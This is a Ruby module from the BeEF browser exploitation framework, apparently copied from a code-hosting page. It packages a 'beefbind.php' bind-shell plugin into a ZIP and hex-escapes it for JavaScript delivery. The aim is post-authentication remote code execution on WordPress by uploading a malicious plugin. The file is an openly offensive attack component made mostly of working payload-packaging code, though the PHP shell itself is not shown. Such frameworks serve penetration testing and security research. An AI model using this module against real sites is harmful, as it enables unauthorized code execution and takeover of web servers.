36 lines
1.1 KiB
Ruby
36 lines
1.1 KiB
Ruby
#
|
|
# Copyright (c) Browser Exploitation Framework (BeEF) - http://beefproject.com
|
|
# See the file 'doc/COPYING' for copying permission
|
|
#
|
|
# This is a rewrite of the original module misc/wordpress_post_auth_rce.
|
|
#
|
|
# Original Author: Bart Leppens
|
|
# Rewritten by Erwan LR (@erwan_lr | WPScanTeam)
|
|
#
|
|
|
|
require_relative '../wordpress_command'
|
|
|
|
class Wordpress_upload_rce_plugin < WordPressCommand
|
|
# Generate the plugin ZIP file as string. The method is called in the command.js.
|
|
# This allows easy modification of the beefbind.php to suit the needs, as well as being automatically generated
|
|
# even when the module is used with automated rules
|
|
def self.generate_zip_payload
|
|
stringio = Zip::OutputStream::write_buffer do |zio|
|
|
zio.put_next_entry("beefbind.php")
|
|
zio.write(File.read(File.join(File.dirname(__FILE__), 'beefbind.php')))
|
|
end
|
|
|
|
stringio.rewind
|
|
|
|
payload = stringio.sysread
|
|
escaped_payload = ''
|
|
|
|
# Escape payload to be able to put it in the JS
|
|
payload.each_byte do |byte|
|
|
escaped_payload << "\\" + ("x%02X" % byte)
|
|
end
|
|
|
|
escaped_payload
|
|
end
|
|
end
|